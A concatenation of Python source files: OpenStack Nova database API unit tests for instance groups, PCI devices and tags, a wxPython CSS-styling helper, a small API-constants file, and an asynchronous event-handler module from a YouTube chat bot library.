result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
def test_instance_group_create_with_same_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
self._create_instance_group(self.context, values)
self.assertRaises(exception.InstanceGroupIdExists,
self._create_instance_group, self.context, values)
def test_instance_group_get(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
result2 = db.instance_group_get(self.context, result1['uuid'])
self._assertEqualObjects(result1, result2)
def test_instance_group_update_simple(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
values = {'name': 'new_name', 'user_id': 'new_user',
'project_id': 'new_project'}
db.instance_group_update(self.context, result1['uuid'],
values)
result2 = db.instance_group_get(self.context, result1['uuid'])
self.assertEqual(result1['uuid'], result2['uuid'])
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result2, values, ignored_keys)
def test_instance_group_delete(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
db.instance_group_delete(self.context, result['uuid'])
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete, self.context,
result['uuid'])
def test_instance_group_get_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_get,
self.context,
'nonexistent')
def test_instance_group_delete_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete,
self.context,
'nonexistent')
def test_instance_group_get_all(self):
groups = db.instance_group_get_all(self.context)
self.assertEqual(0, len(groups))
value = self._get_default_values()
result1 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
self.assertEqual(1, len(groups))
value = self._get_default_values()
result2 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
def test_instance_group_get_all_by_project_id(self):
groups = db.instance_group_get_all_by_project_id(self.context,
'invalid_project_id')
self.assertEqual(0, len(groups))
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all_by_project_id(self.context,
'fake_project')
self.assertEqual(1, len(groups))
values = self._get_default_values()
values['project_id'] = 'new_project_id'
result2 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
projects = [{'name': 'fake_project', 'value': [result1]},
{'name': 'new_project_id', 'value': [result2]}]
for project in projects:
groups = db.instance_group_get_all_by_project_id(self.context,
project['name'])
self._assertEqualListsOfObjects(project['value'], groups)
def test_instance_group_update(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
id = result['uuid']
values = self._get_default_values()
values['name'] = 'new_fake_name'
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self.assertEqual(result['name'], 'new_fake_name')
# update update members
values = self._get_default_values()
members = ['instance_id1', 'instance_id2']
values['members'] = members
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
# update update policies
values = self._get_default_values()
policies = ['policy1', 'policy2']
values['policies'] = policies
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
# test invalid ID
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_update, self.context,
'invalid_id', values)
def test_instance_group_get_by_instance(self):
values = self._get_default_values()
group1 = self._create_instance_group(self.context, values)
members = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, group1.uuid, members)
group2 = db.instance_group_get_by_instance(self.context,
'instance_id1')
self.assertEqual(group2.uuid, group1.uuid)
class InstanceGroupMembersDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_members_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
members = ['instance_id1', 'instance_id2']
result = self._create_instance_group(self.context, values,
members=members)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
def test_instance_group_members_add(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members = db.instance_group_members_get(self.context, id)
self.assertEqual(members, [])
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
def test_instance_group_members_update(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
# check add with existing keys
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_delete(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
for instance_id in members3[:]:
db.instance_group_member_delete(self.context, id, instance_id)
members3.remove(instance_id)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_invalid_ids(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
id = result['uuid']
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_members_get,
self.context, 'invalid')
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_member_delete, self.context,
'invalidid', 'instance_id1')
members = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members)
self.assertRaises(exception.InstanceGroupMemberNotFound,
db.instance_group_member_delete,
self.context, id, 'invalid_id')
class InstanceGroupPoliciesDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_policies_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
policies = ['policy1', 'policy2']
result = self._create_instance_group(self.context, values,
policies=policies)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
def test_instance_group_policies_add(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
policies = db.instance_group_policies_get(self.context, id)
self.assertEqual(policies, [])
policies2 = ['policy1', 'policy2']
db.instance_group_policies_add(self.context, id, policies2)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies2)
def test_instance_group_policies_update(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
policies2 = ['policy1', 'policy2']
db.instance_group_policies_add(self.context, id, policies2)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies2)
policies3 = ['policy1', 'policy2', 'policy3']
db.instance_group_policies_add(self.context, id, policies3)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies3)
def test_instance_group_policies_delete(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
policies3 = ['policy1', 'policy2', 'policy3']
db.instance_group_policies_add(self.context, id, policies3)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies3)
for policy in policies3[:]:
db.instance_group_policy_delete(self.context, id, policy)
policies3.remove(policy)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies3)
def test_instance_group_policies_invalid_ids(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
id = result['uuid']
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_policies_get,
self.context, 'invalid')
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_policy_delete, self.context,
'invalidid', 'policy1')
policies = ['policy1', 'policy2']
db.instance_group_policies_add(self.context, id, policies)
self.assertRaises(exception.InstanceGroupPolicyNotFound,
db.instance_group_policy_delete,
self.context, id, 'invalid_policy')
class PciDeviceDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(PciDeviceDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
self.admin_context = context.get_admin_context()
self.ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
def _get_fake_pci_devs(self):
return {'id': 3353,
'compute_node_id': 1,
'address': '0000:0f:08.7',
'vendor_id': '8086',
'product_id': '1520',
'numa_node': 1,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}, {'id': 3356,
'compute_node_id': 1,
'address': '0000:0f:03.7',
'vendor_id': '8083',
'product_id': '1523',
'numa_node': 0,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}
def _create_fake_pci_devs(self):
v1, v2 = self._get_fake_pci_devs()
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
return (v1, v2)
def test_pci_device_get_by_addr(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_addr(self.admin_context, 1,
'0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_addr_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_get_by_addr, self.admin_context,
1, '0000:0f:08:09')
def test_pci_device_get_by_addr_low_priv(self):
self._create_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_get_by_addr,
self.context, 1, '0000:0f:08.7')
def test_pci_device_get_by_id(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_id(self.admin_context, 3353)
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_id_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFoundById,
db.pci_device_get_by_id,
self.admin_context, 3354)
def test_pci_device_get_by_id_low_priv(self):
self._create_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_get_by_id,
self.context, 3553)
def test_pci_device_get_all_by_node(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_all_by_node_empty(self):
v1, v2 = self._get_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 9)
self.assertEqual(len(results), 0)
def test_pci_device_get_all_by_node_low_priv(self):
self._create_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_get_all_by_node,
self.context, 1)
def test_pci_device_get_by_instance_uuid(self):
v1, v2 = self._get_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_by_instance_uuid_check_status(self):
v1, v2 = self._get_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1], self.ignored_keys)
def test_pci_device_update(self):
v1, v2 = self._get_fake_pci_devs()
v1['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
v1['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_update_low_priv(self):
v1, v2 = self._get_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_update, self.context,
v1['compute_node_id'], v1['address'], v1)
def test_pci_device_destroy(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
db.pci_device_destroy(self.admin_context, v1['compute_node_id'],
v1['address'])
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v2], self.ignored_keys)
def test_pci_device_destroy_exception(self):
v1, v2 = self._get_fake_pci_devs()
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1], self.ignored_keys)
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_destroy,
self.admin_context,
v2['compute_node_id'],
v2['address'])
class RetryOnDeadlockTestCase(test.TestCase):
def test_without_deadlock(self):
@sqlalchemy_api._retry_on_deadlock
def call_api(*args, **kwargs):
return True
self.assertTrue(call_api())
def test_raise_deadlock(self):
self.attempts = 2
@sqlalchemy_api._retry_on_deadlock
def call_api(*args, **kwargs):
while self.attempts:
self.attempts = self.attempts - 1
raise db_exc.DBDeadlock("fake exception")
return True
self.assertTrue(call_api())
class TestSqlalchemyTypesRepr(test_base.DbTestCase):
def setUp(self):
super(TestSqlalchemyTypesRepr, self).setUp()
meta = MetaData(bind=self.engine)
self.table = Table(
'cidr_tbl',
meta,
Column('id', Integer, primary_key=True),
Column('addr', col_types.CIDR())
)
self.table.create()
self.addCleanup(meta.drop_all)
def test_cidr_repr(self):
addrs = [('192.168.3.0/24', '192.168.3.0/24'),
('2001:db8::/64', '2001:db8::/64'),
('192.168.3.0', '192.168.3.0/32'),
('2001:db8::', '2001:db8::/128'),
(None, None)]
with self.engine.begin() as conn:
for i in addrs:
conn.execute(self.table.insert(), {'addr': i[0]})
query = self.table.select().order_by(self.table.c.id)
result = conn.execute(query)
for idx, row in enumerate(result):
self.assertEqual(addrs[idx][1], row.addr)
class TestMySQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.MySQLOpportunisticTestCase):
pass
class TestPostgreSQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.PostgreSQLOpportunisticTestCase):
pass
class TestDBInstanceTags(test.TestCase):
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'}
}
def setUp(self):
super(TestDBInstanceTags, self).setUp()
self.user_id = 'user1'
self.project_id = 'project1'
self.context = context.RequestContext(self.user_id, self.project_id)
def _create_instance(self):
inst = db.instance_create(self.context, self.sample_data)
return inst['uuid']
def _get_tags_from_resp(self, tag_refs):
return [(t.resource_id, t.tag) for t in tag_refs]
def test_instance_tag_add(self):
uuid = self._create_instance()
tag = 'tag'
tag_ref = db.instance_tag_add(self.context, uuid, tag)
self.assertEqual(uuid, tag_ref.resource_id)
self.assertEqual(tag, tag_ref.tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tag for the instance was added
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_add_duplication(self):
uuid = self._create_instance()
tag = 'tag'
for x in xrange(5):
db.instance_tag_add(self.context, uuid, tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the only one tag for the instance was added
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_set(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
tag4 = 'tag4'
# Set tags to the instance
db.instance_tag_set(self.context, uuid, [tag1, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were set
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
self.assertEqual(expected, tags)
# Set new tags to the instance
db.instance_tag_set(self.context, uuid, [tag3, tag4, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were replaced
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag3), (uuid, tag4), (uuid, tag2)]
self.assertEqual(set(expected), set(tags))
def test_instance_tag_get_by_instance_uuid(self):
uuid1 = self._create_instance()
uuid2 = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
db.instance_tag_add(self.context, uuid1, tag1)
db.instance_tag_add(self.context, uuid2, tag1)
db.instance_tag_add(self.context, uuid2, tag2)
db.instance_tag_add(self.context, uuid2, tag3)
# Check the tags for the first instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid1)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid1, tag1)]
self.assertEqual(expected, tags)
# Check the tags for the second instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid2)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid2, tag1), (uuid2, tag2), (uuid2, tag3)]
self.assertEqual(expected, tags)
def test_instance_tag_get_by_instance_uuid_no_tags(self):
uuid = self._create_instance()
self.assertEqual([], db.instance_tag_get_by_instance_uuid(self.context,
uuid))
def test_instance_tag_delete(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete(self.context, uuid, tag1)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag2)]
self.assertEqual(expected, tags)
def test_instance_tag_delete_non_existent(self):
uuid = self._create_instance()
self.assertRaises(exception.InstanceTagNotFound,
db.instance_tag_delete, self.context, uuid, 'tag')
def test_instance_tag_delete_all(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete_all(self.context, uuid)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([], tags)
def test_instance_tag_add_to_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound, db.instance_tag_add,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_set_to_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound, db.instance_tag_set,
self.context, 'fake_uuid', ['tag1', 'tag2'])
def test_instance_tag_get_from_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_get_by_instance_uuid, self.context,
'fake_uuid')
def test_instance_tag_delete_from_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound, db.instance_tag_delete,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_delete_all_from_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_delete_all,
self.context, 'fake_uuid')
|
py | b4002a8f080dde9dd50cadcab098e0293699a3dc | # -*- coding: utf-8 -*-
import tinycss as tcss
from collections import namedtuple
def SetControlStyleSheet(wxCtrl, style):
"""
Apply CSS style to wxCtrl object
wxCtrl: wxPython control
A wxPython control
style: ``str``
A string with CSS style, like: ``#self{property: value}``, where
``#self`` can be any string, because currently specific selectors
are not supported.
"""
parsed = parse_stylesheet(style)
properties = {"background-color": _SetBackgroundColor,
"font-size": _SetFontSize,
"font-family": _SetFontFaceName,
"color": _SetForegroundColor}
for prop,val in parsed.items():
if prop in properties:
properties[prop](wxCtrl,val)
def parse_stylesheet(src):
"""
Parse a stylesheet using tinycss
src : ``str``
A string like: ``"#self{property: value}"``
"""
propfuns = {"background-color":get_background,
"font-size":get_font_size,
"font-family": get_font_family,
"color": get_foreground}
props = {}
css = tcss.CSSPage3Parser()
sheet = css.parse_stylesheet(src)
for rule in sheet.rules:
for decl in rule.declarations:
if decl.name in propfuns:
props[decl.name] = propfuns[decl.name](decl.value[0].value) #
return props
# ========================= get_property functions ==================
def get_background(prop):
"""
Background Color property
"""
return prop
def get_font_size(prop):
"""
Font size property
"""
return prop
def get_font_family(prop):
"""
Font family property
"""
return prop
def get_foreground(prop):
"""
Foreground Color property
"""
return prop
# ===================== _Set* functions ======================
def _SetFontSize(ctrl,size):
"""
Set the FontSize for a control
"""
cfont = ctrl.GetFont()
cfont.SetPointSize(size)
ctrl.SetFont(cfont)
def _SetFontFaceName(ctrl,name):
"""
Set the font name
Parameters
----------
ctrl: wxPython control
A wxPython control
name: str
A font name, i.e. "Arial", "Courier New"
"""
cfont = ctrl.GetFont()
cfont.SetFaceName(name)
ctrl.SetFont(cfont)
def _SetBackgroundColor(ctrl,color):
"""
Set the background color
Parameters
----------
ctrl : wxPython control
A wxPython control
color : str, wx.Color
A string or wx.Color class
"""
ctrl.SetBackgroundColour(color)
def _SetForegroundColor(ctrl,color):
"""
Set the background color
Parameters
----------
ctrl : wxPython control
A wxPython control
color : str, wx.Color
A string or wx.Color class
"""
ctrl.SetForegroundColour(color)
# ========================== Themes ================================
def SetTheme(container, theme):
prop = namedtuple('Properties','container_color,control_color')
black = prop("#101010","#595959")
white = prop("#dadada","#f0f0f0")
blue = prop("#7777dd","#aaaaff")
if "black" in theme:
container.SetBackgroundColour(black.container_color)
_recursive_theme(container.GetChildren(), black)
elif "blue" in theme:
container.SetBackgroundColour(blue.container_color)
_recursive_theme(container.GetChildren(), blue)
else:
container.SetBackgroundColour(white.container_color)
_recursive_theme(container.GetChildren(), white)
def _recursive_theme(children, props):
for child in children:
print child.__class__
if child.__class__.__name__ in ["Panel","Frame"]:
child.SetBackgroundColour(props.container_color)
child.Refresh()
return self._recursive_theme(child.GetChildren(), properties)
else: #Otherwise
child.SetBackgroundColour(props.control_color)
child.Refresh()
# ============================ Tests functions =====================
def test():
import wx
app = wx.App()
fr = wx.Frame(None, -1, "This")
sz = wx.BoxSizer(wx.VERTICAL)
bt = wx.Button(fr, -1, "Button")
lb = wx.StaticText(fr, -1, "Label")
txt = wx.TextCtrl(fr, -1, "Editable")
SetControlStyleSheet(fr, "#self{background-color: #585858;}")
# Add controls
sz.Add(bt, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(lb, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(txt, 1, wx.EXPAND|wx.ALL, 2)
# Styles
btstyle = "#self{color: #e0e0e0;}"
lbstyle = "#self{background-color: #052205; color: #fafa77;}"
txtstyle = "#self{font-size: 20px;}"
SetControlStyleSheet(bt, btstyle)
SetControlStyleSheet(lb, lbstyle)
SetControlStyleSheet(txt, txtstyle)
fr.SetSizer(sz)
fr.Centre()
fr.Show()
app.MainLoop()
def test_theme():
import wx
app = wx.App()
fr = wx.Frame(None, -1, "This")
sz = wx.BoxSizer(wx.VERTICAL)
bt = wx.Button(fr, -1, "Button")
lb = wx.StaticText(fr, -1, "Label")
txt = wx.TextCtrl(fr, -1, "Editable")
# Add controls
sz.Add(bt, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(lb, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(txt, 1, wx.EXPAND|wx.ALL, 2)
SetTheme(fr, "blue")
fr.SetSizer(sz)
fr.Centre()
fr.Show()
app.MainLoop()
if __name__=='__main__':
test_theme()
|
py | b4002b2597533bd51931a2dc2bd8ee97915de947 | JSON_PLACEHOLDER_API_HOST = "jsonplaceholder.typicode.com"
JP_USERS_ENDPOINT = "/users"
|
py | b4002b518d01da13c0fbe3b8194ca804962cb97c | # Copyright (c) 2021-2022, Ethan Henderson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import annotations
import asyncio
import logging
import traceback
import typing as t
from collections import defaultdict
from collections.abc import Awaitable
from dataclasses import dataclass
from chatto.errors import NoEventQueue
from chatto.message import Message
from chatto.secrets import Secrets
from chatto.stream import Stream
log = logging.getLogger(__name__)
@dataclass(eq=True, frozen=True)
class Event:
"""The base dataclass for all events."""
def __str__(self) -> str:
return self.__class__.__name__
@dataclass(eq=True, frozen=True)
class ReadyEvent(Event):
"""Event dispatched once the bot is ready to start receiving
messages."""
@dataclass(eq=True, frozen=True)
class MessageCreatedEvent(Event):
"""Event dispatched when a message has been sent to the live
chat by a user."""
message: Message
"""The received message."""
@dataclass(eq=True, frozen=True)
class StreamFetchedEvent(Event):
"""Event dispatched when stream information has been fetched."""
stream: Stream
"""The stream for which information has been fetched for."""
@dataclass(eq=True, frozen=True)
class ChatPolledEvent(Event):
"""Event dispatched when the YouTube live chat is polled."""
data: dict[str, t.Any]
"""The data received from the poll."""
@dataclass(eq=True, frozen=True)
class MessageSentEvent(Event):
"""Event dispatched when a message has been sent to the live
chat by the bot."""
message: Message
"""The sent message."""
@dataclass(eq=True, frozen=True)
class AuthorisedEvent(Event):
"""Event dispatched once the bot has been authorised with
OAuth 2."""
secrets: Secrets
"""The secrets data."""
tokens: dict[str, t.Any]
"""The OAuth tokens."""
if t.TYPE_CHECKING:
CallbacksT = dict[t.Type[Event], list[t.Callable[[Event], Awaitable[t.Any]]]]
ListenerT = t.Callable[[t.Callable[[t.Any], t.Any]], None]
class EventHandler:
"""A class that can be attached to the bot to handle events."""
__slots__ = ("_queue", "callbacks")
def __init__(self) -> None:
self.callbacks: CallbacksT = defaultdict(list)
"""A mapping of events to their respective callbacks."""
@property
def queue(self) -> asyncio.Queue[Event] | None:
"""The event queue the bot is using. If the event queue has not
been created, this will be `None`."""
return getattr(self, "_queue", None)
@property
def queue_size(self) -> int:
"""The size of the event queue. If the event queue has not been
created, this will be 0."""
if not self.queue:
return 0
return self._queue.qsize()
async def create_queue(self) -> None:
"""Create the event queue. This is handled for you."""
if self.queue:
log.warning("The event handler already has an event queue")
self._queue: asyncio.Queue[Event] = asyncio.Queue()
async def process(self) -> None:
"""A forever-looping task that processes events once they are
pushed onto the queue."""
if not self.queue:
raise NoEventQueue("there is no event queue")
while True:
try:
event = await self._queue.get()
log.debug(f"Retrieved {event} event")
for cb in self.callbacks[event.__class__]:
log.debug(f"Running callback '{cb.__name__}' for event...")
await cb(event)
except Exception:
log.error(f"Ignoring error processing {event} event:")
traceback.print_exc()
async def dispatch(self, event_type: t.Type[Event], *args: t.Any) -> Event:
"""Dispatch an event. This puts the event on the event queue.
## Arguments
* `event_type` -
The event type to put on the queue. This **must** be a
subclass of `Event`.
* `*args` -
A series of arguments to be passed to the event callback
when called.
## Returns
The event instance.
## Raises
`NoEventQueue` -
The event queue has not been created.
"""
if not self.queue:
raise NoEventQueue("there is no event queue")
event = event_type(*args)
await self._queue.put(event)
log.debug(f"Dispatched {event_type.__name__} event")
return event
